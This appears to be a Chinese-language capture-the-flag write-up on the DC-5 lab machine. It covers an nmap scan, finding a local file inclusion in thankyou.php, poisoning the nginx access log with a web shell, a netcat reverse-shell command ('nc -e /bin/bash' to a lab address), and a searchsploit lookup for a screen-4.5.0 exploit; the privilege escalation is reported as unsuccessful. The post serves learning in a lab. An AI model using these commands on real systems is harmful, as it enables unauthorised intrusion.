DC-5
0x00
1 | nmap -Pn 192.168.114.0/24 |
特地查了一下rpcbind,大概是将RPC服务映射到其侦听的端口的服务,和DNS类似。
rpcbind [3]实用程序将RPC服务映射到其侦听的端口。RPC进程在启动时会通知rpcbind,注册正在侦听的端口以及期望使用的RPC程序号。然后,客户端系统使用特定的RPC程序服务器与服务器上的rpcbind联系。rpcbind服务重新设置客户端重定向到正确的端口号,刹车它可以与请求的服务进行通信
80端口也是打开的,先试试从80端口入手
wappalyzer只检测出它是php编写的,以及服务器是nginx。
访问contact的时候,发现有一个留言功能,或许可以试试xss
burp跑了字典,不行
试试跑目录,什么都没跑出来
sql注入,试了几个原始头参数,没用
实在没办法了,还是乖乖的去看大佬文章学知识吧
作者提到,当我们提交contact表单时,下边的logo会从2019变成2020
未提交前:
提交后:
测试了很久发现是LFI漏洞
其实首页就已经提示了是本地文件包含漏洞
用/etc/passwd测试,存在LFI漏洞
按理来说,像数据库日志文件,登陆日志文件,访问日志文件,linux的话,都在/var下,那就直接去看看access文件
1 | http://192.168.114.133/thankyou.php?file=/var/log/nginx/access.log |
学到一个新知识
这样插入一句话木马的,我还是第一次见
提交成功
验证一下cmd是否可以执行,给cmd一个parameter,用**&cmd=id**
全局搜索一下uid
请出netcat
1 | nc -e /bin/bash 192.168.114.1 1234 |
再在本地执行
1 | nc -lvp 1234 |
奇怪的是,我在windows下怎么做都不成功
所以只好切换成kali
然后
不太知道这是什么,查了下
2>/dev/null
2是错误输出
/dev/null 代表 linux 的空设备文件
2>/dev/null 意思就是把错误输出到“黑洞” ,也就是空文件中
锁定目标screen-4.5.0,我的理解是个程序之类的东西,
kali自带漏洞搜索,那就查查
1 | searchsploit screen |
接下来就是漏洞利用
好像不太行得通
试试另一个41154.sh
提权未成功
再议
总结
要细心观察每一个地方的变化